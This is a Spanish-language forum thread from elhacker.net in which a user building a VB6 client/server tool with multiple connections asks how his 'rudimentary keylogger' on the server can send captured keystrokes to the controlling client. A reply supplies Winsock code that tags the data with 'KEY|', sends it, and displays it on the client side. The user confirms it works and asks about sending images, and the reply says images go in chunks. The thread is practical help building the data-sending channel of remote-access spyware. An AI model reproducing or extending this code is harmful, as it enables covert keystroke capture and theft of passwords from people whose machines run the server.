elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  Ayuda aplicación cliente/servidor VB 6.0
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Ayuda aplicación cliente/servidor VB 6.0  (Leído 2,885 veces)
clanctkvolde123

Desconectado Desconectado

Mensajes: 5


Ver Perfil
Ayuda aplicación cliente/servidor VB 6.0
« en: 24 Octubre 2016, 17:08 pm »

Hola buenas, ando programando una aplicación Cliente/servidor con multiconexiones gracias a un tutorial encontrado en esta página. (War ghost)
A la hora de agregarle funciones es donde me surge el problema. Espero, que me pudierais ayudar.
En la llegada de datos del tutorial consta lo siguiente:
Código
  1. Private Sub ws_DataArrival(index As Integer, ByVal bytesTotal As Long)
  2. Dim data As String 'Declaracion
  3. Dim vData As Variant 'Declaracion
  4. Dim pr
  5. Dim cmsgsep As Long 'Declaracion
  6. ws(index).GetData data
  7. vData = Split(data, "|")
  8. Select Case vData(0)
  9. Case "Conexion" 'Cose de conexion
  10. Set pr = Listconexion.ListItems.Add(, index & "|", vData(1)) 'Agreamos una nueva conexion a listview
  11. pr.SubItems(1) = vData(2) & "/" & ws(index).RemoteHostIP
  12. pr.SubItems(2) = vData(3) & "/" & vData(4)
  13. pr.SubItems(3) = vData(5)
  14. pr.SubItems(4) = vData(6)
  15. End select
  16. End sub


Por lo tanto, cuando el servidor (index) envie conexion se rellenarán los campos del listbox con sus datos, hasta ahi todo correcto.
El problema es que he añadido al server un keylogger muy rudimentario, simplemente un texbox que recoge todo lo que teclea el ordenador, mi duda es la siguiente.
¿Como puedo configurar el server para que envie el contenido del texbox al cliente y este lo recoga en otro textbox del cliente?
Entiendo que será declarar en el server una variable que contenga el contenido del texbox.
Código
  1. Dim variable1 as string
  2. variable = text1.text
  3. Ws.senddata variable

Pero el problema es que no se configurar el cliente para que este lo reciba y lo aplique en el texbox.
Saludos y gracias por vuestro tiempo.

MOD: Etiquetas GeSHi.


« Última modificación: 24 Octubre 2016, 22:41 pm por MCKSys Argentina » En línea

fary


Desconectado Desconectado

Mensajes: 1.062



Ver Perfil WWW
Re: Ayuda aplicación cliente/servidor VB 6.0
« Respuesta #1 en: 25 Octubre 2016, 15:28 pm »

Ya que en el DataArrival tienes un filtro  con un Select Case tendrás que enviar los datos de la siguiente manera:

Código
  1.    Dim variable1 as string
  2.    variable = "KEY|" ' Esto es para el filtro, que sepa el servidor que es para el keylogger
  3.    variable = variable & text1.text
  4.    Ws.senddata variable

Y en el servidor lo tendrías que modificar un poco:

Código
  1.    Private Sub ws_DataArrival(index As Integer, ByVal bytesTotal As Long)
  2.    Dim data As String 'Declaracion
  3.    Dim vData As Variant 'Declaracion
  4.    Dim pr
  5.    Dim cmsgsep As Long 'Declaracion
  6.    ws(index).GetData data
  7.    vData = Split(data, "|")
  8.    Select Case vData(0)
  9.    Case "Conexion" 'Cose de conexion
  10.    Set pr = Listconexion.ListItems.Add(, index & "|", vData(1)) 'Agreamos una nueva conexion a listview
  11.    pr.SubItems(1) = vData(2) & "/" & ws(index).RemoteHostIP
  12.    pr.SubItems(2) = vData(3) & "/" & vData(4)
  13.    pr.SubItems(3) = vData(5)
  14.    pr.SubItems(4) = vData(6)
  15.  
  16.        case "KEY" ' La clave que pusimos para el keylogger
  17.            text1.text = vData(1) ' Ponemos los datos en el TextBox
  18.    End select
  19.    End sub


El código no se si funciona porque lo he ido poniendo sobre la marcha pero la idea es esa.

saludos.


En línea

Un byte a la izquierda.
clanctkvolde123

Desconectado Desconectado

Mensajes: 5


Ver Perfil
Re: Ayuda aplicación cliente/servidor VB 6.0
« Respuesta #2 en: 25 Octubre 2016, 15:57 pm »

Ya que en el DataArrival tienes un filtro  con un Select Case tendrás que enviar los datos de la siguiente manera:

Código
  1.    Dim variable1 as string
  2.    variable = "KEY|" ' Esto es para el filtro, que sepa el servidor que es para el keylogger
  3.    variable = variable & text1.text
  4.    Ws.senddata variable

Y en el servidor lo tendrías que modificar un poco:

Código
  1.    Private Sub ws_DataArrival(index As Integer, ByVal bytesTotal As Long)
  2.    Dim data As String 'Declaracion
  3.    Dim vData As Variant 'Declaracion
  4.    Dim pr
  5.    Dim cmsgsep As Long 'Declaracion
  6.    ws(index).GetData data
  7.    vData = Split(data, "|")
  8.    Select Case vData(0)
  9.    Case "Conexion" 'Cose de conexion
  10.    Set pr = Listconexion.ListItems.Add(, index & "|", vData(1)) 'Agreamos una nueva conexion a listview
  11.    pr.SubItems(1) = vData(2) & "/" & ws(index).RemoteHostIP
  12.    pr.SubItems(2) = vData(3) & "/" & vData(4)
  13.    pr.SubItems(3) = vData(5)
  14.    pr.SubItems(4) = vData(6)
  15.  
  16.        case "KEY" ' La clave que pusimos para el keylogger
  17.            text1.text = vData(1) ' Ponemos los datos en el TextBox
  18.    End select
  19.    End sub


El código no se si funciona porque lo he ido poniendo sobre la marcha pero la idea es esa.

saludos.
Gracias por la ayuda, voy a probar y te comento.
Tengo otro post por aqui, agradeceria que le echases un vistazo a ver si tienes alguna idea.
En línea

clanctkvolde123

Desconectado Desconectado

Mensajes: 5


Ver Perfil
Re: Ayuda aplicación cliente/servidor VB 6.0
« Respuesta #3 en: 25 Octubre 2016, 16:02 pm »

Funciona perfectamente, muchas gracias, jeje, me preguntaba si a traves de la misma formula podrian enviarse imagenes para ponerlas en un picturebox?
En línea

fary


Desconectado Desconectado

Mensajes: 1.062



Ver Perfil WWW
Re: Ayuda aplicación cliente/servidor VB 6.0
« Respuesta #4 en: 25 Octubre 2016, 16:08 pm »

Funciona perfectamente, muchas gracias, jeje, me preguntaba si a traves de la misma formula podrian enviarse imagenes para ponerlas en un picturebox?

No, una imagen la tienes que enviar por fragmentos, como si fuera un archivo, luego guardarla en el disco y ya si, mostrarla.

saludos.
En línea

Un byte a la izquierda.
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Aplicacion cliente-servidor en JAVA
Java
rex 5 21,401 Último mensaje 28 Septiembre 2004, 12:01 pm
por rex
Opinen de aplicacion cliente/servidor
Programación Visual Basic
shadow.darknesses 4 2,011 Último mensaje 20 Enero 2007, 02:16 am
por shadow.darknesses
aplicación cliente-servidor
Programación Visual Basic
saliaz 8 3,657 Último mensaje 5 Abril 2008, 01:39 am
por gulabyte
aplicacion cliente-servidor sin winsock? « 1 2 »
Programación Visual Basic
saliaz 13 6,029 Último mensaje 13 Abril 2008, 11:46 am
por ~~
Aplicacion Cliente-Servidor en VB .Net
.NET (C#, VB.NET, ASP)
CGST 2 5,630 Último mensaje 14 Julio 2011, 19:19 pm
por Jesuscc29
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines